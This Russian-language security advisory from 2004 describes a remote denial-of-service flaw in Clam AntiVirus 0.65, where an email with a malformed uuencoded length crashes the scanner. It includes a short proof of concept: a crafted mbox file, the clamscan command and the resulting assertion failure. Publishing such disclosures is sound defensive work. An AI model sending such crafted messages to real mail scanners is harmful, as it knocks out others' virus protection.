Security Lab

Удаленый отказ в обслуживании против Clam AntiVirus

Дата публикации:13.02.2004
Дата изменения:17.10.2006
Всего просмотров:1296
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Clam AntiVirus (clamav) 0.x
Уязвимые версии: Clam AntiVirus 0.65

Описание: Уязвимость обнаружена в Clam AntiVirus. Удаленный пользователь может аварийно завершить работу программы.

Удаленный пользователь может послать email сообщение, содержащее uuencoded строку с некорректным значением длины через email сообщение, чтобы аварийно завершить работу антивируса.

Пример/Эксплоит:

>How-To-Repeat:

Save the following file to ~/clamtest.mbox, removing the leading 'X':

XFrom -
 
Xbegin 644 byebye
Xbyebye
Xend

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", lin
e 887
Abort (core dumped)

or

# clamdscan -v ~/clamtest.mbox; ps ax | grep clam

URL производителя: http://www.clamav.net/

Решение:Неофициальное исправление см. в источнике сообщения.

Ссылки: clamav 0.65 remote DOS exploit